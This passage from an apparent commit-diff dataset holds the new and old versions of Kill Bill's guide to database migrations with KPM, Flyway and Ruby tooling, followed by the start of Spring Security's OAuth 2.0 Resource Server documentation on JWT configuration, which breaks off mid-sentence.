DDL file per major version (http:\/\/docs.killbill.io\/0.22\/ddl.sql[0.22 example]). 
\n\n== Migrations with Docker images\n\nThe `Migrations tooling` section below goes into detail on how migrations are handled for individual components, and on the tooling available to update your database schema when upgrading Kill Bill.\n\nIf you are using our standard Docker images, the procedure is simplified, as follows:\n\n1. Update the `\/var\/lib\/killbill\/kpm.yml` file in one of your containers to reflect the new version of Kill Bill you want to upgrade to (a sketch follows below).\n2. Run `$MIGRATIONS_CMD`. This will:\n ** Configure the database for migrations if needed (i.e. create the `schema_version` table(s), see below)\n ** Fetch all migrations needed to upgrade to the Kill Bill version specified in the `kpm.yml`\n ** Display the SQL that would be run (for Kill Bill and each plugin) and prompt the user whether it should be applied\n\nDepending on your dataset size, you may or may not want the script to apply these directly (e.g. you may prefer to use an online-schema-change tool for production), in which case you can simply grab the SQL output instead.
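\n\nAs a rough sketch of step 1, the key part of the `kpm.yml` is the Kill Bill version itself; a minimal file could look like the following (the exact layout depends on your installation):\n\n[source,yaml]\n----\nkillbill:\n version: 0.20.10\n----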
\n\nCaveats:\n\n* This is only supported since `killbill\/killbill:0.20.10`\n* Ruby migrations aren't supported (if you have any, see the manual steps below)\n\n== Migrations tooling\n\nIn order to ease the database migrations, we decided to rely on standard tools for migrating from one given version to a higher version:\n\n* For Java components (Kill Bill itself, java plugins), we rely on https:\/\/flywaydb.org\/[Flyway]\n* For Ruby components (ruby plugins, KAUI, ...), we rely on http:\/\/edgeguides.rubyonrails.org\/active_record_migrations.html[Active Record migrations]\n\nIn addition to these standard tools, we also enhanced our existing tooling to support the following use cases:\n\n* Ability to download all the migration files associated with a migration from version `N` to `M` (see section `KPM` below)\n* Ability to output SQL (migration files) for production systems (see section `SQL output` below)\n\n=== KPM\n\nWe extended https:\/\/github.com\/killbill\/killbill-cloud\/tree\/master\/kpm[KPM] with a new `migrations` verb to be able to **download migration files** that should be applied when migrating from one version to the next.\n\nUsage:\n\n[source,bash]\n----\nkpm migrations github_repository from_tag to_tag\n----\n\nFor example, to download all migration files for Kill Bill between 0.16.12 and 0.18.0:\n\n```\nkpm migrations killbill killbill-0.16.12 killbill-0.18.0\n```\n\nSimilar examples for Java and Ruby plugins:\n\n[source,bash]\n----\nkpm migrations killbill-analytics-plugin analytics-plugin-3.0.0 analytics-plugin-3.0.1\nkpm migrations killbill-cybersource-plugin v4.0.1 v4.0.2\n----\n\nBecause the implementation relies on the https:\/\/developer.github.com\/[GitHub API], unauthenticated requests are subject to https:\/\/developer.github.com\/v3\/#rate-limiting[rate limiting]. To work around it, go to https:\/\/github.com\/settings\/tokens to generate a token (default public, read-only, permissions will work) and specify it to KPM:\n\n[source,bash]\n----\nkpm migrations killbill killbill-0.16.3 killbill-0.16.4 --token=TOKEN\n----\n\n=== SQL output\n\nIn production environments, database access is often restricted and developers don't necessarily have rights to execute DDL commands (i.e. `CREATE`, `ALTER`, `DROP`, etc. statements). To get around this, we provide scripts to get access to the SQL that needs to be run for the migrations, including the `INSERT` statements to update the metadata table(s).\n\n==== Java\n\nFor Java code (Kill Bill and Java plugins), we publish a `killbill-flyway.jar` binary which is a wrapper around the `flyway` utility and exposes a `dryRunMigrate` command. Simply run it against your production database (read-only credentials are sufficient) to get the raw SQL.\n\nUsage example:\n\n[source,bash]\n----\n# \/var\/folders\/tmp\/migrations is the directory where the migration files were downloaded (using kpm migrate)\njava -jar killbill-flyway.jar -locations=filesystem:\/var\/folders\/tmp\/migrations -url='jdbc:mysql:\/\/DATABASE_IP:DATABASE_PORT\/DATABASE_NAME' -user=<USERNAME> -password=<PASSWORD> dryRunMigrate\n----\n\n==== Ruby\n\nFor Ruby code, we provide a `killbill-migration` script with the `killbill` gem (JRuby is recommended, see our http:\/\/docs.killbill.io\/latest\/payment_plugin.html#_building_ruby_plugins[installation instructions]).\n\nBesides outputting the SQL, it can also run the migrations.\n\nUsage examples:\n\n[source,bash]\n----\nkillbill-migration current_version cybersource\nkillbill-migration sql_for_migration cybersource --path=XXX\nkillbill-migration migrate cybersource --path=XXX\nkillbill-migration ruby_dump cybersource\nkillbill-migration sql_dump cybersource\n----\n\nOptions `--username`, `--password`, `--database` and `--host` are supported.\n\nIf you are a plugin developer, these commands are also available as part of the default Rake tasks of the plugin itself, for example:\n\n[source,bash]\n----\nPLUGIN_NAME=paypal_express USERNAME=root PASSWORD=root DB=killbill rake killbill:db:sql_for_migration\nPLUGIN_NAME=paypal_express USERNAME=root PASSWORD=root DB=killbill rake killbill:db:migrate\n----\n\nNote that the `PLUGIN_NAME` variable needs to match the prefix of the `schema_migrations` table.\n\n\n=== Kill Bill\n\nStarting with Kill Bill 0.16.4, SQL migration files for Flyway are provided. They can be found on a per-module basis under `\\*\/src\/main\/resources\/org\/killbill\/billing\/*\/migration\/`. The versioning is based on the creation timestamp (i.e. `date +'%Y%m%d%H%M%S'`) and must be unique for each file so as to indicate the ordering (what Flyway calls the `version_rank`).
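\n\nFor example, a migration file following Flyway's standard `V<version>__<description>.sql` naming could be created like so (the `add_account_notes` description is purely illustrative):\n\n[source,bash]\n----\n# produces a name like V20170315120000__add_account_notes.sql\ntouch \"V$(date +'%Y%m%d%H%M%S')__add_account_notes.sql\"\n----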
\n\n==== Baseline\n\nFor Flyway migrations to work correctly, there is an initial https:\/\/flywaydb.org\/documentation\/command\/baseline[baseline] operation that needs to happen so as to create the metadata table, called `schema_version`. In the scenario where a developer can run their own migrations, the following command would be run:\n\n[source,bash]\n----\nflyway -url='jdbc:mysql:\/\/DATABASE_IP:DATABASE_PORT\/DATABASE_NAME' -user=<USERNAME> -password=<PASSWORD> baseline\n----\n\nIn the production scenario, the `schema_version` table along with the initial version would have to be created manually:\n\n[source,sql]\n----\nCREATE TABLE `schema_version` (\n `installed_rank` int(11) NOT NULL,\n `version` varchar(50) DEFAULT NULL,\n `description` varchar(200) NOT NULL,\n `type` varchar(20) NOT NULL,\n `script` varchar(1000) NOT NULL,\n `checksum` int(11) DEFAULT NULL,\n `installed_by` varchar(100) NOT NULL,\n `installed_on` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,\n `execution_time` int(11) NOT NULL,\n `success` tinyint(1) NOT NULL,\n PRIMARY KEY (`installed_rank`),\n KEY `schema_version_s_idx` (`success`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\ninsert into schema_version (installed_rank, version, description, type, script, installed_by, installed_on, execution_time, success) VALUES (1, 1, '<< Flyway Baseline >>', 'BASELINE', '<< Flyway Baseline >>', 'admin', NOW(), 0, 1);\n----\n\n==== Migration from version `N` to `M`\n\nA typical migration from version `N` to `M` requires first identifying the set of migration files that should be applied, and then applying them either via Flyway commands or manually (production use case).\n\n\n[source,bash]\n----\n# Will download migration files in a temporary folder (e.g. \/var\/folders\/XXX)\nkpm migrations killbill killbill-N killbill-M --token='GITHUB_TOKEN'\n\n# If using flyway is an option\nflyway -url='jdbc:mysql:\/\/DATABASE_IP:DATABASE_PORT\/DATABASE_NAME' -user=<USERNAME> -password=<PASSWORD> -locations=filesystem:\/var\/folders\/XXX migrate\n\n----\n\n=== Java plugins\n\nJava plugin migrations also rely on https:\/\/flywaydb.org\/[Flyway] and follow a similar workflow to Kill Bill itself. They can be found in each plugin under `src\/main\/resources\/migration\/`.\n\nThe metadata table should be called `<plugin_name>_schema_version`. Make sure to specify `-table=<plugin_name>_schema_version` when invoking Flyway.\n\n=== Ruby plugins\n\nRuby plugin migrations rely on http:\/\/edgeguides.rubyonrails.org\/active_record_migrations.html[Active Record migrations]. Migrations are located under `db\/migrate\/`. You can use the `killbill-migration` tool (see above) to run the migrations.\n\nThe metadata table should be called `<plugin_name>_schema_migrations`, e.g.:\n\n[source,sql]\n----\nCREATE TABLE `cybersource_schema_migrations` (\n `version` varchar(255) NOT NULL\n) ENGINE=InnoDB DEFAULT CHARSET=utf8\n----\n\nNote: adapt the DDL for your RDBMS engine.\n","old_contents":"= Kill Bill Database Migrations\n\n== Overview\n\nA typical Kill Bill deployment is comprised of several components: The core Kill Bill webapp and some plugins. Migrating the software to a higher version may require to migrate one, a few or all the different components and so potentially upgrading the database schema associated with one, a few or all of those components. The compatibility version between core Kill Bill and its plugins depends on the version of the https:\/\/github.com\/killbill\/killbill-plugin-api[plugin api] exported by a given Kill Bill version. 
The https:\/\/github.com\/killbill\/killbill-cloud\/tree\/master\/kpm[KPM] tool allows to list compatible plugins associated with a given Kill Bill version:\n\n[source,bash]\n----\nkpm info --version <killbill_version>\n----\n\nKill Bill and individual plugins assume specific tables, functions, etc. are installed in your database. The source of truth for the schema (DDL) files are:\n\n* In individual modules for Kill Bill, under `\\*\/src\/main\/resources\/org\/killbill\/billing\/*\/ddl.sql` (for example https:\/\/github.com\/killbill\/killbill\/tree\/master\/account\/src\/main\/resources\/org\/killbill\/billing\/account\/ddl.sql[account\/src\/main\/resources\/org\/killbill\/billing\/account\/ddl.sql]).\n* Under `src\/main\/resources\/ddl.sql` for Java plugins (https:\/\/github.com\/killbill\/killbill-adyen-plugin\/tree\/master\/src\/main\/resources\/ddl.sql[Adyen example]).\n* Under `db\/ddl.sql` for Ruby plugins (https:\/\/github.com\/killbill\/killbill-cybersource-plugin\/tree\/master\/db\/ddl.sql[CyberSource example]).\n\nThese files always contain the latest version, matching the latest code in that specific branch\/tag.\n\nTo access a specific version:\n\n* For Kill Bill itself, we publish a full DDL file per major version, available at http:\/\/docs.killbill.io\/<VERSION>\/ddl.sql (http:\/\/docs.killbill.io\/0.22\/ddl.sql[0.22 example]). The DDL for the latest stable version of Kill Bill is at http:\/\/docs.killbill.io\/latest\/ddl.sql[http:\/\/docs.killbill.io\/latest\/ddl.sql].\n* For individual plugins, you can get the DDL file of a given version on GitHub by looking-up the specific tag (for v4.0.2 of the CyberSource plugin, it would be at https:\/\/github.com\/killbill\/killbill-cybersource-plugin\/tree\/v4.0.2\/db\/ddl.sql).\n\n== Migrations with Docker images\n\nThe `Migrations tooling` section below goes into details on how migrations are handled for individual components, and the tooling available to you to update your database schema when upgrading Kill Bill.\n\nIf you are using our standard Docker images, the procedure is simplified and as follows:\n\n1. Update the `\/var\/lib\/killbill\/kpm.yml` file in one of your containers to reflect the new version of Kill Bill you want to upgrade to.\n2. Run `$MIGRATIONS_CMD`. This will:\n ** Configure the database for migrations if needed (i.e. create the `schema_version` table(s), see below)\n ** Fetch all migrations needed to upgrade to the Kill Bill version specified in the `kpm.yml`\n ** Display the SQL that would be run (for Kill Bill and each plugin) and prompt the user whether it should be applied\n\nDepending on your dataset size, you may or may not want the script to apply these directly (e.g. 
you may prefer to use an online-schema-change tool for production), in which case you can simply grab the SQL output instead.\n\nCaveats:\n\n* This is only supported since `killbill\/killbill:0.20.10`\n* Ruby migrations aren't supported (if you have any, see the manual steps below)\n\n== Migrations tooling\n\nIn order to ease the database migrations, we decided to rely on standard tools for migrating from one given version to a higher version:\n\n* For Java componenents (Kill Bill itself, java plugins), we rely on https:\/\/flywaydb.org\/[Flyway]\n* For Ruby components (ruby plugins, KAUI, ...), we rely on http:\/\/edgeguides.rubyonrails.org\/active_record_migrations.html[Active Record migrations]\n\nIn addition to these standard tools, we also enhanced our existing tooling to support the following use cases:\n\n* Ability to download all the migration files associated with a migration from version `N` to `M` (see section `KPM` below)\n* Ability to output SQL (migration files) for production systems (see section `SQL output` below)\n\n=== KPM\n\nWe extended (https:\/\/github.com\/killbill\/killbill-cloud\/tree\/master\/kpm[KPM] with a new `migrations` verb to be able to **download migration files** that should be applied when migrating from one version to the next.\n\nUsage:\n\n[source,bash]\n----\nkpm migrations github_repository from_tag to_tag\n----\n\nFor example, to download all migration files for Kill Bill between 0.16.12 and 0.18.0:\n\n```\nkpm migrations killbill killbill-0.16.12 killbill-0.18.0\n```\n\nSimilar examples for Java and Ruby plugins:\n\n[source,bash]\n----\nkpm migrations killbill-analytics-plugin analytics-plugin-3.0.0 analytics-plugin-3.0.1\nkpm migrations killbill-cybersource-plugin v4.0.1 v4.0.2\n----\n\nBecause the implementation relies on the https:\/\/developer.github.com\/[GitHub API], unauthenticated requests are subject to https:\/\/developer.github.com\/v3\/#rate-limiting[rate limiting]. To work around it, go to https:\/\/github.com\/settings\/tokens to generate a token (default public, read-only, permissions will work) and specify it to KPM:\n\n[source,bash]\n----\nkpm migrations killbill killbill-0.16.3 killbill-0.16.4 --token=TOKEN\n----\n\n=== SQL output\n\nIn production environments, database access is often restricted and developers don't necessarily have rights to execute DDL commands (i.e. `CREATE`, `ALTER`, `DROP`, etc. statements). To get around this, we provide scripts to get access to the SQL that needs to be run for the migrations, including the `INSERT` statements to update the metadata table(s).\n\n==== Java\n\nFor Java code (Kill Bill and Java plugins), we publish a `killbill-flyway.jar` binary which is a wrapper around the `flyway` utility and exposes a `dryRunMigrate` command. 
Simply run it against your production database (read-only credentials are sufficient) to get the raw SQL.\n\nUsage example:\n\n[source,bash]\n----\n# \/var\/folders\/tmp\/migrations is the directory where the migration files were downoaded (using kpm migrate)\njava -jar killbill-flyway.jar -locations=filesystem:\/var\/folders\/tmp\/migrations -url='jdbc:mysql:\/\/DATABASE_IP:DATABASE_PORT\/DATABASE_NAME' -user=<USERNAME> -password=<PASSWORD> dryRunMigrate\n----\n\n==== Ruby\n\nFor Ruby code, we provide a `killbill-migration` script with the `killbill` gem (JRuby is recommended, see our http:\/\/docs.killbill.io\/latest\/payment_plugin.html#_building_ruby_plugins[installation instructions]).\n\nBesides outputting the SQL, it can also run the migrations.\n\nUsage examples:\n\n[source,bash]\n----\nkillbill-migration current_version cybersource\nkillbill-migration sql_for_migration cybersource --path=XXX\nkillbill-migration migrate cybersource --path=XXX\nkillbill-migration ruby_dump cybersource\nkillbill-migration sql_dump cybersource\n----\n\nOptions `--username`, `--password`, `--database` and `--host` are supported.\n\nIf you are a plugin developer, these commands are also available as part of the default Rake tasks of the plugin itself, for example:\n\n[source,bash]\n----\nPLUGIN_NAME=paypal_express USERNAME=root PASSWORD=root DB=killbill rake killbill:db:sql_for_migration\nPLUGIN_NAME=paypal_express USERNAME=root PASSWORD=root DB=killbill rake killbill:db:migrate\n----\n\nNote that the `PLUGIN_NAME` variable needs to match the prefix of the `schema_migrations` table.\n\n\n=== Kill Bill\n\nStarting with Kill Bill 0.16.4, SQL migrations files for Flyway are provided. They can be found on a per-module basis under `\\*\/src\/main\/resources\/org\/killbill\/billing\/*\/migration\/`. The versioning is based on the creation timestamp (i.e. `date +'%Y%m%d%H%M%S'`) and must be unique for each file so as to indicate the ordering (what Flyway calls the `version_rank`).\n\n==== Baseline\n\nFor Flyway migrations to work correctly, there is an initial https:\/\/flywaydb.org\/documentation\/command\/baseline[baseline] operation that needs to happens so as to create the metadata table, called `schema_version`. 
In the scenario where a developer can run its own migrations, the following command would be run:\n\n[source,bash]\n----\nflyway -url='jdbc:mysql:\/\/DATABASE_IP:DATABASE_PORT\/DATABASE_NAME' -user=<USERNAME> -password=<PASSWORD> baseline\n----\n\nIn the production scenario, the `schema_version` along with the initial version would have to be created manually:\n\n[source,sql]\n----\nCREATE TABLE `schema_version` (\n `installed_rank` int(11) NOT NULL,\n `version` varchar(50) DEFAULT NULL,\n `description` varchar(200) NOT NULL,\n `type` varchar(20) NOT NULL,\n `script` varchar(1000) NOT NULL,\n `checksum` int(11) DEFAULT NULL,\n `installed_by` varchar(100) NOT NULL,\n `installed_on` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,\n `execution_time` int(11) NOT NULL,\n `success` tinyint(1) NOT NULL,\n PRIMARY KEY (`installed_rank`),\n KEY `schema_version_s_idx` (`success`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\ninsert into schema_version (installed_rank, version, description, type, script, installed_by, installed_on, execution_time, success) VALUES (1, 1, '<< Flyway Baseline >>', 'BASELINE', '<< Flyway Baseline >>', 'admin', NOW(), 0, 1);\n----\n\n==== Migration from version `N` to `M`\n\nA typical migration from version `N` to `M` will require to first identify the set of migrations files that should be applied and then either apply them using Flyway commands or manually (production use case).\n\n\n[source,bash]\n----\n# Will download migration files in a temporary folder (e.g \/var\/folders\/XXX)\nkpm migrations killbill killbill-N killbill-M --token='GITHUB_TOKEN'\n\n# If using flyway is an option\nflyway -url='jdbc:mysql:\/\/DATABASE_IP:DATABASE_PORT\/DATABASE_NAME' -user=<USERNAME> -password=<PASSWORD> -locations=filesystem:\/var\/folders\/XXX migrate\n\n----\n\n=== Java plugins\n\nJava plugins migrations also rely on https:\/\/flywaydb.org\/[Flyway] and follow a similar workflow than Kill Bill itself. They can be found in each plugin under `src\/main\/resources\/migration\/`.\n\nThe metadata table should be called `<plugin_name>_schema_version`. Make sure to specify `-table=<plugin_name>_schema_version` when invoking Flyway.\n\n=== Ruby plugins\n\nRuby plugins migrations rely on http:\/\/edgeguides.rubyonrails.org\/active_record_migrations.html[Active Record migrations]. Migrations are located under `db\/migrate\/`. 
You can use the `killbill-migration` tool (see above) to run the migrations.\n\nThe metadata table should be called `<plugin_name>_schema_migrations`, e.g.:\n\n[source,sql]\n----\nCREATE TABLE `cybersource_schema_migrations` (\n `version` varchar(255) NOT NULL\n) ENGINE=InnoDB DEFAULT CHARSET=utf8\n----\n\nNote: adapt the DDL for your RDBMS engine.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0bde3c5c8f6916dc4824c864ef1074a10c759d2a","subject":"Clarify ServerBearerExchangeFilterFunction Docs","message":"Clarify ServerBearerExchangeFilterFunction Docs\n\nFixes gh-8220\n","repos":"spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security","old_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/servlet\/oauth2\/oauth2-resourceserver.adoc","new_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/servlet\/oauth2\/oauth2-resourceserver.adoc","new_contents":"[[oauth2resourceserver]]\n== OAuth 2.0 Resource Server\n\nSpring Security supports protecting endpoints using two forms of OAuth 2.0 https:\/\/tools.ietf.org\/html\/rfc6750.html[Bearer Tokens]:\n\n* https:\/\/tools.ietf.org\/html\/rfc7519[JWT]\n* Opaque Tokens\n\nThis is handy in circumstances where an application has delegated its authority management to an https:\/\/tools.ietf.org\/html\/rfc6749[authorization server] (for example, Okta or Ping Identity).\nThis authorization server can be consulted by resource servers to authorize requests.\n\n[NOTE]\n====\nWorking samples for both {gh-samples-url}\/boot\/oauth2resourceserver[JWTs] and {gh-samples-url}\/boot\/oauth2resourceserver-opaque[Opaque Tokens] are available in the {gh-samples-url}[Spring Security repository].\n====\n\n=== Dependencies\n\nMost Resource Server support is collected into `spring-security-oauth2-resource-server`.\nHowever, the support for decoding and verifying JWTs is in `spring-security-oauth2-jose`, meaning that both are necessary in order to have a working resource server that supports JWT-encoded Bearer Tokens.\n\n[[oauth2resourceserver-jwt-minimalconfiguration]]\n=== Minimal Configuration for JWTs\n\nWhen using https:\/\/spring.io\/projects\/spring-boot[Spring Boot], configuring an application as a resource server consists of two basic steps.\nFirst, include the needed dependencies and second, indicate the location of the authorization server.\n\n==== Specifying the Authorization Server\n\nIn a Spring Boot application, to specify which authorization server to use, simply do:\n\n[source,yml]\n----\nspring:\n security:\n oauth2:\n resourceserver:\n jwt:\n issuer-uri: https:\/\/idp.example.com\/issuer\n----\n\nWhere `https:\/\/idp.example.com\/issuer` is the value contained in the `iss` claim for JWT tokens that the authorization server will issue.\nResource Server will use this property to further self-configure, discover the authorization server's public keys, and subsequently validate incoming JWTs.\n\n[NOTE]\nTo use the `issuer-uri` property, it must also be true that one of `https:\/\/idp.example.com\/issuer\/.well-known\/openid-configuration`, `https:\/\/idp.example.com\/.well-known\/openid-configuration\/issuer`, or `https:\/\/idp.example.com\/.well-known\/oauth-authorization-server\/issuer` is a supported endpoint for the authorization server.\nThis endpoint is referred to as a 
https:\/\/openid.net\/specs\/openid-connect-discovery-1_0.html#ProviderConfig[Provider Configuration] endpoint or a https:\/\/tools.ietf.org\/html\/rfc8414#section-3[Authorization Server Metadata] endpoint.\n\nAnd that's it!\n\n==== Startup Expectations\n\nWhen this property and these dependencies are used, Resource Server will automatically configure itself to validate JWT-encoded Bearer Tokens.\n\nIt achieves this through a deterministic startup process:\n\n1. Hit the Provider Configuration or Authorization Server Metadata endpoint, processing the response for the `jwks_url` property\n2. Configure the validation strategy to query `jwks_url` for valid public keys\n3. Configure the validation strategy to validate each JWTs `iss` claim against `https:\/\/idp.example.com`.\n\nA consequence of this process is that the authorization server must be up and receiving requests in order for Resource Server to successfully start up.\n\n[NOTE]\nIf the authorization server is down when Resource Server queries it (given appropriate timeouts), then startup will fail.\n\n==== Runtime Expectations\n\nOnce the application is started up, Resource Server will attempt to process any request containing an `Authorization: Bearer` header:\n\n[source,html]\n----\nGET \/ HTTP\/1.1\nAuthorization: Bearer some-token-value # Resource Server will process this\n----\n\nSo long as this scheme is indicated, Resource Server will attempt to process the request according to the Bearer Token specification.\n\nGiven a well-formed JWT, Resource Server will:\n\n1. Validate its signature against a public key obtained from the `jwks_url` endpoint during startup and matched against the JWT\n2. Validate the JWT's `exp` and `nbf` timestamps and the JWT's `iss` claim, and\n3. Map each scope to an authority with the prefix `SCOPE_`.\n\n[NOTE]\nAs the authorization server makes available new keys, Spring Security will automatically rotate the keys used to validate JWTs.\n\nThe resulting `Authentication#getPrincipal`, by default, is a Spring Security `Jwt` object, and `Authentication#getName` maps to the JWT's `sub` property, if one is present.\n\nFrom here, consider jumping to:\n\n<<oauth2resourceserver-jwt-jwkseturi,How to Configure without Tying Resource Server startup to an authorization server's availability>>\n\n<<oauth2resourceserver-jwt-sansboot,How to Configure without Spring Boot>>\n\n[[oauth2resourceserver-jwt-jwkseturi]]\n=== Specifying the Authorization Server JWK Set Uri Directly\n\nIf the authorization server doesn't support any configuration endpoints, or if Resource Server must be able to start up independently from the authorization server, then the `jwk-set-uri` can be supplied as well:\n\n[source,yaml]\n----\nspring:\n security:\n oauth2:\n resourceserver:\n jwt:\n issuer-uri: https:\/\/idp.example.com\n jwk-set-uri: https:\/\/idp.example.com\/.well-known\/jwks.json\n----\n\n[NOTE]\nThe JWK Set uri is not standardized, but can typically be found in the authorization server's documentation\n\nConsequently, Resource Server will not ping the authorization server at startup.\nWe still specify the `issuer-uri` so that Resource Server still validates the `iss` claim on incoming JWTs.\n\n[NOTE]\nThis property can also be supplied directly on the <<oauth2resourceserver-jwt-jwkseturi-dsl,DSL>>.\n\n[[oauth2resourceserver-jwt-sansboot]]\n=== Overriding or Replacing Boot Auto Configuration\n\nThere are two `@Bean` s that Spring Boot generates on Resource Server's behalf.\n\nThe first is a `WebSecurityConfigurerAdapter` that 
configures the app as a resource server. When including `spring-security-oauth2-jose`, this `WebSecurityConfigurerAdapter` looks like:\n\n.Default JWT Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\nprotected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(OAuth2ResourceServerConfigurer::jwt);\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nfun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(anyRequest, authenticated)\n }\n oauth2ResourceServer {\n jwt { }\n }\n }\n}\n----\n====\n\nIf the application doesn't expose a `WebSecurityConfigurerAdapter` bean, then Spring Boot will expose the above default one.\n\nReplacing this is as simple as exposing the bean within the application:\n\n.Custom JWT Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class MyCustomSecurityConfiguration extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .mvcMatchers(\"\/messages\/**\").hasAuthority(\"SCOPE_message:read\")\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .jwt(jwt -> jwt\n .jwtAuthenticationConverter(myConverter())\n )\n );\n }\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@EnableWebSecurity\nclass MyCustomSecurityConfiguration : WebSecurityConfigurerAdapter() {\n override fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(\"\/messages\/**\", hasAuthority(\"SCOPE_message:read\"))\n authorize(anyRequest, authenticated)\n }\n oauth2ResourceServer {\n jwt {\n jwtAuthenticationConverter = myConverter()\n }\n }\n }\n }\n}\n----\n====\n\nThe above requires the scope of `message:read` for any URL that starts with `\/messages\/`.\n\nMethods on the `oauth2ResourceServer` DSL will also override or replace auto configuration.\n\nFor example, the second `@Bean` Spring Boot creates is a `JwtDecoder`, which decodes `String` tokens into validated instances of `Jwt`:\n\n\n.JWT Decoder\n====\n[source,java]\n----\n@Bean\npublic JwtDecoder jwtDecoder() {\n return JwtDecoders.fromIssuerLocation(issuerUri);\n}\n----\n====\n\n[NOTE]\nCalling `{security-api-url}org\/springframework\/security\/oauth2\/jwt\/JwtDecoders.html#fromIssuerLocation-java.lang.String-[JwtDecoders#fromIssuerLocation]` is what invokes the Provider Configuration or Authorization Server Metadata endpoint in order to derive the JWK Set Uri.\n\nIf the application doesn't expose a `JwtDecoder` bean, then Spring Boot will expose the above default one.\n\nAnd its configuration can be overridden using `jwkSetUri()` or replaced using `decoder()`.\n\nOr, if you're not using Spring Boot at all, then both of these components - the filter chain and a `JwtDecoder` can be specified in XML.\n\nThe filter chain is specified like so:\n\n.Default JWT Configuration\n====\n.Xml\n[source,xml,role=\"primary\"]\n----\n<http>\n <intercept-uri pattern=\"\/**\" access=\"authenticated\"\/>\n <oauth2-resource-server>\n <jwt decoder-ref=\"jwtDecoder\"\/>\n <\/oauth2-resource-server>\n<\/http>\n----\n====\n\nAnd the `JwtDecoder` like so:\n\n.JWT Decoder\n====\n.Xml\n[source,xml,role=\"primary\"]\n----\n<bean id=\"jwtDecoder\"\n class=\"org.springframework.security.oauth2.jwt.JwtDecoders\"\n factory-method=\"fromIssuerLocation\">\n <constructor-arg 
value=\"${spring.security.oauth2.resourceserver.jwt.jwk-set-uri}\"\/>\n<\/bean>\n----\n====\n\n[[oauth2resourceserver-jwt-jwkseturi-dsl]]\n==== Using `jwkSetUri()`\n\nAn authorization server's JWK Set Uri can be configured <<oauth2resourceserver-jwt-jwkseturi,as a configuration property>> or it can be supplied in the DSL:\n\n.JWK Set Uri Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class DirectlyConfiguredJwkSetUri extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .jwt(jwt -> jwt\n .jwkSetUri(\"https:\/\/idp.example.com\/.well-known\/jwks.json\")\n )\n );\n }\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@EnableWebSecurity\nclass DirectlyConfiguredJwkSetUri : WebSecurityConfigurerAdapter() {\n override fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(anyRequest, authenticated)\n }\n oauth2ResourceServer {\n jwt {\n jwkSetUri = \"https:\/\/idp.example.com\/.well-known\/jwks.json\"\n }\n }\n }\n }\n}\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <intercept-uri pattern=\"\/**\" access=\"authenticated\"\/>\n <oauth2-resource-server>\n <jwt jwk-set-uri=\"https:\/\/idp.example.com\/.well-known\/jwks.json\"\/>\n <\/oauth2-resource-server>\n<\/http>\n----\n====\n\nUsing `jwkSetUri()` takes precedence over any configuration property.\n\n[[oauth2resourceserver-jwt-decoder-dsl]]\n==== Using `decoder()`\n\nMore powerful than `jwkSetUri()` is `decoder()`, which will completely replace any Boot auto configuration of `JwtDecoder`:\n\n.JWT Decoder Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class DirectlyConfiguredJwtDecoder extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .jwt(jwt -> jwt\n .decoder(myCustomDecoder())\n )\n );\n }\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@EnableWebSecurity\nclass DirectlyConfiguredJwtDecoder : WebSecurityConfigurerAdapter() {\n override fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(anyRequest, authenticated)\n }\n oauth2ResourceServer {\n jwt {\n jwtDecoder = myCustomDecoder()\n }\n }\n }\n }\n}\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <intercept-uri pattern=\"\/**\" access=\"authenticated\"\/>\n <oauth2-resource-server>\n <jwt decoder-ref=\"myCustomDecoder\"\/>\n <\/oauth2-resource-server>\n<\/http>\n----\n====\n\nThis is handy when deeper configuration, like <<oauth2resourceserver-jwt-validation,validation>>, <<oauth2resourceserver-jwt-claimsetmapping,mapping>>, or <<oauth2resourceserver-jwt-timeouts,request timeouts>>, is necessary.\n\n[[oauth2resourceserver-jwt-decoder-bean]]\n==== Exposing a `JwtDecoder` `@Bean`\n\nOr, exposing a `JwtDecoder` `@Bean` has the same effect as `decoder()`:\n\n[source,java]\n----\n@Bean\npublic JwtDecoder jwtDecoder() {\n return NimbusJwtDecoder.withJwkSetUri(jwkSetUri).build();\n}\n----\n\n[[oauth2resourceserver-jwt-decoder-algorithm]]\n=== Configuring Trusted Algorithms\n\nBy default, `NimbusJwtDecoder`, and hence Resource Server, will only trust and verify tokens using `RS256`.\n\nYou can customize this via <<oauth2resourceserver-jwt-boot-algorithm,Spring Boot>>, 
